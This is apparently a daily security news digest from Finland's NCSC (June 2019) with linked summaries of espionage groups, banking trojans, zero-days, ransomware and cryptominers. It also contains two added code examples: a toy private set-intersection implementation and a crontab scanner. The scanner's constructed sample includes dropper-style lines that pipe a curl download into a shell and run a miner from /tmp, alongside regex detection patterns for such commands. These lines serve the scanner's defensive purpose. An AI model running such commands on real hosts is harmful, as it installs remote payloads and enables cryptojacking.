Daily NCSC-FI news followup 2019-06-20

Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments

www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments Waterbug may have hijacked a separate espionage group's infrastructure during one attack against a Middle Eastern target. The Waterbug espionage group (aka Turla) has continued to attack governments and international organizations over the past eighteen months in a series of campaigns that have featured a rapidly evolving toolset and, in one notable instance, the apparent hijacking of another espionage group's infrastructure.

DanaBot Banking Trojan Upgraded with New Ransomware Module

www.bleepingcomputer.com/news/security/danabot-banking-trojan-upgraded-with-non-ransomware-module/ A new malicious campaign is distributing an upgraded variant of DanaBot that comes with a new ransomware module, used to target potential victims in Italy and Poland via phishing emails that deliver malware droppers. As initially discovered by Proofpoint researchers in May 2018, DanaBot is a modular banking Trojan developed in Delphi and designed to steal banking credentials and sensitive information by collecting form data, taking screenshots, or logging keystrokes on compromised computers. See also:

research.checkpoint.com/danabot-demands-a-ransom-payment/ and

threatpost.com/danabot-ransomware-arsenal/145863/

Firefox zero-day was used in attack against Coinbase employees, not its users

www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/ There were actually two zero-days — not one — combined into an exploit used in a spear-phishing attempt. Other cryptocurrency organizations were also targeted. A recent Firefox zero-day that has made headlines across the tech news world this week was actually used in attacks against Coinbase employees, and not the company’s users, ZDNet has learned. See also:


www.bleepingcomputer.com/news/security/mozilla-firefox-6704-fixes-second-actively-exploited-zero-day/ and

www.bleepingcomputer.com/news/security/firefox-0-day-used-in-targeted-attacks-against-cryptocurrency-firms/

Cryptocurrency Mining Botnet Arrives Through ADB and Spreads Through SSH

blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-botnet-arrives-through-adb-and-spreads-through-ssh/ We observed a new cryptocurrency mining botnet that arrives via open ADB (Android Debug Bridge) ports and can spread via SSH. This attack takes advantage of the way open ADB ports don't have authentication by default, similar to the Satori botnet variant we previously reported. This botnet's design allows it to spread from the infected host to any system that has had a previous SSH connection with the host. The use of ADB makes Android-based devices susceptible to the malware. We detected activity from this botnet in 21 different countries, with the highest percentage found in South Korea.

Cisco critical-flaw warning: These two bugs in our data-center gear need patching now

www.zdnet.com/article/cisco-critical-flaw-warning-these-two-bugs-in-our-data-center-gear-need-patching-now/ Cisco is warning enterprise admins to install security updates for two critical flaws. Networking giant Cisco has disclosed two critical vulnerabilities affecting core equipment in the data center that could give determined attackers an avenue to break into networks. Cisco’s Digital Network Architecture (DNA) Center appliance has once again been found to be vulnerable to an authentication bypass, which could allow an “adjacent” attacker to skip authentication and cause damage to an organization’s critical internal services. The flaw, tagged as CVE-2019-1848, is because Cisco didn’t sufficiently restrict access to ports used to operate the system. The vulnerability would allow an attacker to connect an unauthorized device to the network. See also:

tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-dnac-bypass and threatpost.com/cisco-dna-center-critical-flaw/145849/

Google takes the PIS out of advertising: New algo securely analyzes shared encrypted data sets without leaking contents

www.theregister.co.uk/2019/06/19/google_pis_encryption/ Google on Wednesday released source code for a project called Private Join and Compute that allows two parties to analyze and compare shared sets of data without revealing the contents of each set to the other party. This is useful if you want to see how your private encrypted data set of, say, ad-clicks-to-sales conversion rates, correlates to someone else’s encrypted conversion rate data set without disclosing the actual numbers to either side. This particular technique is a type of secure multiparty computation that builds upon a cryptographic protocol called Private Set-Intersection (PSI). Google employs this approach in a Chrome extension called Password Checkup that lets users test logins and passwords against a dataset of compromised credentials without revealing the query to the internet goliath. See also

threatpost.com/google-computational-privacy/145835/
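To make the technique in the item above concrete, here is an added toy implementation of a private intersection-sum, written for this digest and not taken from Google's Private Join and Compute code. It has the same shape the article describes: a Diffie-Hellman style private set intersection (each party blinds the hashed identifiers with its own secret exponent; because exponentiation commutes, double-blinded values can be compared without either side seeing the other's raw set) combined with Paillier additively homomorphic encryption so the values attached to the matching rows can be summed by the party that cannot decrypt them. The group parameters (the Mersenne prime 2^521-1 for blinding, 2^61-1 and 2^89-1 for the Paillier key) and the sample data are constructed for readability; a real deployment would use an elliptic-curve group and a 2048-bit Paillier modulus.

```python
"""Toy private intersection-sum, in the spirit of Private Join and Compute.

Party 1 holds identifiers (say, users who saw an ad); Party 2 holds identifiers
with an integer value each (say, purchase amounts). Party 1 learns only how many
identifiers are shared, Party 2 learns only the sum of its values over the shared
identifiers, and neither learns which identifiers those are.
"""
import hashlib
import math
import secrets

# Constructed parameters: M521 is prime, so blinding exponents commute,
# (h^a)^b == (h^b)^a mod P. A real deployment uses an elliptic-curve group.
P = (1 << 521) - 1
Q = (P - 1) // 2          # order of the quadratic-residue subgroup we hash into


def hash_to_group(identifier: str) -> int:
    """Hash an identifier into the quadratic residues mod P (squaring lands there)."""
    h = int.from_bytes(hashlib.sha256(identifier.encode()).digest(), "big")
    return pow(h % P, 2, P)


def blind(element: int, key: int) -> int:
    """Apply one party's secret exponent; applying both in either order gives the same value."""
    return pow(element, key, P)


class Paillier:
    """Minimal Paillier: additively homomorphic, so ciphertexts can be summed without the key."""

    def __init__(self, p: int, q: int) -> None:
        self.n, self.n2, self.g = p * q, (p * q) ** 2, p * q + 1
        self.lam = (p - 1) * (q - 1) // math.gcd(p - 1, q - 1)
        self.mu = pow(self._L(pow(self.g, self.lam, self.n2)), -1, self.n)

    def _L(self, u: int) -> int:
        return (u - 1) // self.n

    def encrypt(self, m: int) -> int:          # needs only the public part (n, g)
        r = secrets.randbelow(self.n - 1) + 1
        return pow(self.g, m, self.n2) * pow(r, self.n, self.n2) % self.n2

    def add(self, c1: int, c2: int) -> int:     # product of ciphertexts = sum of plaintexts
        return c1 * c2 % self.n2

    def decrypt(self, c: int) -> int:
        return self._L(pow(c, self.lam, self.n2)) * self.mu % self.n


def private_intersection_sum(party1_ids, party2_records):
    """Run both sides in one process and return (cardinality, sum).

    Each 'msg' below would be a network message; a party sees only what it receives.
    """
    k1 = secrets.randbelow(Q - 1) + 1                    # Party 1's secret exponent
    k2 = secrets.randbelow(Q - 1) + 1                    # Party 2's secret exponent
    paillier = Paillier((1 << 61) - 1, (1 << 89) - 1)    # Party 2's key; toy Mersenne primes
    rng = secrets.SystemRandom()

    # Round 1, Party 1 -> Party 2: identifiers blinded once, shuffled.
    msg1 = [blind(hash_to_group(u), k1) for u in party1_ids]
    rng.shuffle(msg1)

    # Round 2, Party 2 -> Party 1: Party 1's elements blinded a second time, plus Party 2's
    # own elements blinded once, each paired with its encrypted value, both shuffled.
    double_blinded_p1 = {blind(x, k2) for x in msg1}
    msg2 = [(blind(hash_to_group(v), k2), paillier.encrypt(t)) for v, t in party2_records.items()]
    rng.shuffle(msg2)

    # Round 3, Party 1: complete the blinding of Party 2's elements, match against its own
    # double-blinded set, and multiply the matching ciphertexts (it cannot read them).
    enc_sum, cardinality = paillier.encrypt(0), 0
    for blinded_v, enc_t in msg2:
        if blind(blinded_v, k1) in double_blinded_p1:
            cardinality += 1
            enc_sum = paillier.add(enc_sum, enc_t)

    # Round 4, Party 2 decrypts the aggregate; it never sees which rows matched.
    return cardinality, paillier.decrypt(enc_sum)


if __name__ == "__main__":
    clicks = ["alice@example.com", "bob@example.com", "carol@example.com", "dave@example.com"]
    purchases = {"bob@example.com": 30, "dave@example.com": 45, "erin@example.com": 99}
    print(private_intersection_sum(clicks, purchases))   # (2, 75)
```

The shuffles matter: without them, the position of a double-blinded element in the returned list would tell Party 1 which of its own identifiers matched, defeating the point of the intersection being hidden. Note also what is still leaked by design: Party 1 learns the intersection size, and Party 2 learns an aggregate that, for an intersection of size one, is that single row's value.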

Samba Vulnerability Can Crash Active Directory Components

www.bleepingcomputer.com/news/security/samba-vulnerability-can-crash-active-directory-components/ A couple of bugs in some versions of Samba software can help an attacker crash key processes on the network in charge of accessing directory, application, and server services. The two vulnerabilities can be leveraged separately to crash the LDAP (Lightweight Directory Access Protocol) and the RPC (remote procedure call) server processes in Samba Active Directory Domain Controller, supported since version 4.0 of the software.

The U.S. Loses Over $1.5 Trillion in a Decade of Data Breaches

www.bleepingcomputer.com/news/security/the-us-loses-over-15-trillion-in-a-decade-of-data-breaches/ A decade's collection of data breaches shows a bleak picture, with billions of records exposed in this type of incident and financial damages of more than $1.6 trillion. Data collected from public sources reveal that since 2008 there were close to 9,700 breach events in the U.S., involving more than 10.7 billion records, with an average cost calculated in 2018 at $148 per record.

ISC Releases BIND Security Updates

www.us-cert.gov/ncas/current-activity/2019/06/19/ISC-Releases-BIND-Security-Updates The Internet Systems Consortium (ISC) has released updates that address a vulnerability in versions of ISC Berkeley Internet Name Domain (BIND). A remote attacker could exploit this vulnerability to cause a denial-of-service condition. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the ISC advisory for CVE-2019-6471 and apply the necessary updates.

Check Point's Threat Emulation Stops Large-Scale Phishing Campaign in Germany

blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/ During the first week of June 2019, Check Point researchers encountered a new, large-scale phishing campaign targeting German companies across all industries. The hackers' goal was to install Remcos, a remote-control tool, on the victims' computers. The attackers initially sent fake emails that appeared to be from several legitimate companies across Germany. These emails contained invoice or urgent-order attachments which were actually Remcos archives attempting to connect with the attackers' command and control (C&C) server. See also

forensics.checkpoint.com/remcos_te/ThreatEmulationReport.html and forensics.checkpoint.com/remcos/index.html

Modular Plurox Malware Is a Wormable Backdoor Cryptominer

www.bleepingcomputer.com/news/security/modular-plurox-malware-is-a-wormable-backdoor-cryptominer/ A new modular backdoor malware strain capable of mining cryptocurrencies and of spreading to other machines on the local network with the help of SMB and UPnP plugins has been detected by Kaspersky security researchers. The backdoor malware, named Plurox, was discovered in February and seems to be still in its testing phase, given that its source code and the communication channels it uses to contact its command-and-control (C&C) server are not yet encrypted in any way. See also:

securelist.com/plurox-modular-backdoor/91213/

Feds: Cyberattack on NASAs JPL Threatened Mission-Control Data

threatpost.com/feds-hackers-mission-control-data-nasa-jpl/145842/ Rampant security-operations bungling allowed cyberattackers to infiltrate JPL's network, which carries human mission data. NASA's Jet Propulsion Laboratory (JPL) may know how to send delicate equipment to Mars, but basic cybersecurity best practices appear to pose an issue for it. A comprehensive federal review has detailed an April 2018 security incident that compromised mission systems, stemming from multiple IT security-control weaknesses exposing NASA systems and data. The review, released Tuesday and carried out by the U.S. Office of the Inspector General, said that the weaknesses reduce JPL's ability to prevent, detect and mitigate attacks targeting its systems and networks. Specifically, poor practices when it comes to network segmentation and third parties were the source of a cyberattack in April 2018, OIG said. See also oig.nasa.gov/docs/IG-19-022.pdf

Cryptominer Uses Cron To Reinfect Linux Host After Removal

www.bleepingcomputer.com/news/security/cryptominer-uses-cron-to-reinfect-linux-host-after-removal/ A cryptomining dropper malware has been spotted by security researchers gaining persistence on Linux hosts by adding cron jobs that reinfect the compromised machines after the miner is removed. The malware was initially discovered on a web server whose CPU was maxed out by a malicious process, a sure sign of a host infected with cryptomining malware configured to use all available computing resources. As Sucuri's security analyst Luke Leal found after taking a closer look, the cryptominer is downloaded by attackers using a Bash script dropped on the server via an unknown method, most probably after exploiting an unpatched vulnerability, brute forcing their way in, or phishing the admin credentials. See also:

blog.sucuri.net/2019/06/cryptomining-dropper-and-cronjob-creator.html
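The practical lesson of the item above is that killing the miner process and deleting its binary is not enough; the cron entry that re-downloads the dropper has to be found as well. The following scanner is an added example written for this digest, not Sucuri's or BleepingComputer's code. It parses crontab text (user crontabs, plus the system files that carry an extra user column) and flags entries that look like a re-infection hook. The indicator list is an assumption about what such jobs typically contain, not a signature taken from the article, and the sample crontab is constructed (the 198.51.100.0/24 addresses are a documentation range).

```python
"""Flag crontab entries that look like a cryptominer re-infection hook."""
import os
import re
from dataclasses import dataclass

# Assumed indicators of a dropper-style cron job; tune for your environment.
INDICATORS = [
    ("download-and-execute", re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b")),
    ("runs from scratch dir", re.compile(r"(^|[\s/=])(/tmp|/dev/shm|/var/tmp)/")),
    ("base64 decoded payload", re.compile(r"base64\s+(-d|--decode)")),
    ("silenced output", re.compile(r">\s*/dev/null\s+2>&1")),
    ("hidden path", re.compile(r"/\.[A-Za-z0-9_-]+/")),
]
SPECIAL = {"@reboot", "@hourly", "@daily", "@weekly", "@monthly", "@yearly", "@annually"}


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reasons: list


def parse_entry(line: str):
    """Return (schedule, command) for a job line; None for blanks, comments and VAR=value lines.

    For /etc/crontab and /etc/cron.d the sixth field is the user name; it is left in the
    command string, which is harmless for the pattern checks below.
    """
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", s):
        return None
    if s.startswith("@"):
        parts = s.split(None, 1)
        return (parts[0], parts[1]) if parts[0] in SPECIAL and len(parts) == 2 else None
    parts = s.split(None, 5)
    return (" ".join(parts[:5]), parts[5]) if len(parts) == 6 else None


def every_minute(schedule: str) -> bool:
    """True when the minute field fires every minute, the cadence a re-infection loop wants."""
    return schedule.split()[0] in ("*", "*/1")


def scan_crontab(text: str) -> list:
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        entry = parse_entry(line)
        if not entry:
            continue
        schedule, command = entry
        reasons = [name for name, rx in INDICATORS if rx.search(command)]
        if reasons and every_minute(schedule):
            reasons.append("runs every minute")
        if reasons:
            findings.append(Finding(no, schedule, command, reasons))
    return findings


def scan_system(roots=("/etc/crontab", "/etc/cron.d", "/var/spool/cron")) -> dict:
    """Scan the usual crontab locations on a Linux host (the spool needs root); path -> findings."""
    results = {}
    for root in roots:
        paths = [root] if os.path.isfile(root) else [
            os.path.join(d, f) for d, _, files in os.walk(root) for f in files]
        for path in paths:
            try:
                with open(path, errors="replace") as fh:
                    hits = scan_crontab(fh.read())
            except OSError:
                continue
            if hits:
                results[path] = hits
    return results


# Constructed sample, not a real capture: one benign job and three that should be flagged.
SAMPLE_CRONTAB = """\
# constructed sample, not a real capture
MAILTO=""
0 3 * * * /usr/bin/certbot renew --quiet
*/1 * * * * curl -fsSL http://198.51.100.23/.x/dropper.sh | sh > /dev/null 2>&1
@reboot /tmp/.ICE-unix/kworker -o stratum+tcp://198.51.100.23:3333
15 * * * * echo "L2Jpbi9zaA==" | base64 -d | bash
"""

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no} [{f.schedule}] {', '.join(f.reasons)}: {f.command}")
    for path, hits in scan_system().items():
        print(path, [h.line_no for h in hits])
```

Run `scan_system()` as root after cleaning a host; a job that fires every minute and pipes a download into a shell is the pattern to remove before killing the miner, otherwise it is back within a minute. Cron is only one persistence spot, so systemd timers, rc scripts and `~/.bashrc` style hooks deserve the same look.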

Oracle issues emergency update to patch actively exploited WebLogic flaw

arstechnica.com/information-technology/2019/06/oracle-issues-emergency-update-to-patch-actively-exploited-weblogic-flaw/ Oracle on Tuesday published an out-of-band update patching a critical code-execution vulnerability in its WebLogic server after researchers warned that the flaw was being actively exploited in the wild. The vulnerability, tracked as CVE-2019-2729, allows an attacker to run malicious code on the WebLogic server without any need for authentication. That capability earned the vulnerability a Common Vulnerability Scoring System score of 9.8 out of 10. The vulnerability is a deserialization attack targeting two Web applications that WebLogic appears to expose to the Internet by default: wls9_async_response and wls-wsat.war. The flaw in Oracle's WebLogic Java application servers came to light as a zero-day four days ago when it was reported by security firm KnownSec404. See also:

blog.yoroi.company/warning/nuova-vulnerabilita-in-oracle-weblogic/

Florida city pays $600,000 to ransomware gang to have its data back

www.zdnet.com/article/florida-city-pays-600000-to-ransomware-gang-to-have-its-data-back/ The city council for Riviera Beach, Florida, voted this week to pay more than $600,000 to a ransomware gang so city officials could recover data that had been locked and encrypted more than three weeks ago. See also:

www.tivi.fi/uutiset/tv/33c14270-e69b-4c9b-a8d0-92e8448e8074

A neighbour's invoice unexpectedly popped out of the printer of Heli, 42, from Turku. How on earth is that possible?

www.is.fi/digitoday/art-2000006148351.html?ref=rss Unpatched printers may let outsiders print on them freely. The manufacturer says it has since addressed the issue with updates. The direct-print app shows the name of the device being printed to. If two identical devices are close to each other, however, they can only be told apart by the device-specific identifier in the printer's network name, and that is only visible by looking it up in the printer's settings.

Tor Browser 8.5.2 Released to Fix Critical Vulnerability

www.bleepingcomputer.com/news/software/tor-browser-852-released-to-fix-critical-vulnerability/ Tor Browser 8.5.2 has been released to fix a critical vulnerability in Firefox that was fixed by Mozilla this week. It is strongly advised that all Tor users install this update as soon as possible. This week, Mozilla released Firefox 67.0.3 to fix a critical vulnerability discovered by Google Project Zero. The fix for this vulnerability has been ported to the bundled Firefox browser in Tor Browser 8.5.2. This JavaScript type confusion vulnerability was discovered being actively used in targeted attacks and thus needed immediate attention. This bug did not affect users running under the Safer or Safest security levels. See also:

www.zdnet.com/article/tor-browser-8-5-2-release-patches-firefox-flaw-being-exploited-in-the-wild/,

threatpost.com/tor-browser-update-critical-flaw/145857/ and

thehackernews.com/2019/06/tor-browser-firefox-hack.html

Russian APT hacked Iranian APT’s infrastructure back in 2017

www.zdnet.com/article/russian-apt-hacked-iranian-apts-infrastructure-back-in-2017/ Turla APT hacked Iran's APT34 group and used its C&C servers to re-infect APT34 victims with its own malware. As fellow ZDNet writer Andrada Fiscutean once wrote in the fall of 2017: "Spies hack. But the best spies hack other spies." That story revolved around a Virus Bulletin 2017 talk detailing several mysterious cases where APTs (advanced persistent threats, a technical term used to describe government-backed hacking units) appeared to have compromised the infrastructure of other APTs, either by accident or intentionally. While investigating this campaign for its own report, Symantec said it found evidence that sometime in November 2017, the Turla APT (which Symantec calls Waterbug) had hacked into the server infrastructure of an Iranian APT known as APT34 (also known as OilRig or Crambus). See also:

www.bleepingcomputer.com/news/security/turla-espionage-group-hacks-oilrig-apt-infrastructure/

Linux Cryptominer Uses Virtual Machines to Attack Windows, macOS

www.bleepingcomputer.com/news/security/linux-cryptominer-uses-virtual-machines-to-attack-windows-macos/ A new cryptocurrency mining malware dubbed LoudMiner uses virtualization software to deploy a Linux XMRig coinminer variant on Windows and macOS systems via a Tiny Core Linux virtual machine. The malware comes bundled with cracked copies of Windows and macOS VST software such as Propellerhead Reason, Ableton Live, Sylenth1, Nexus, Reaktor, and AutoTune.

A scam message is spreading in Finnair's name: don't click

www.is.fi/digitoday/tietoturva/art-2000006149309.html Finnair reports on Facebook that a phishing message is circulating in the company's name on Facebook and Instagram. It is an advertisement disguised as a Finnair post, promising free flight tickets to anyone who hands over their details on the website linked from the post.
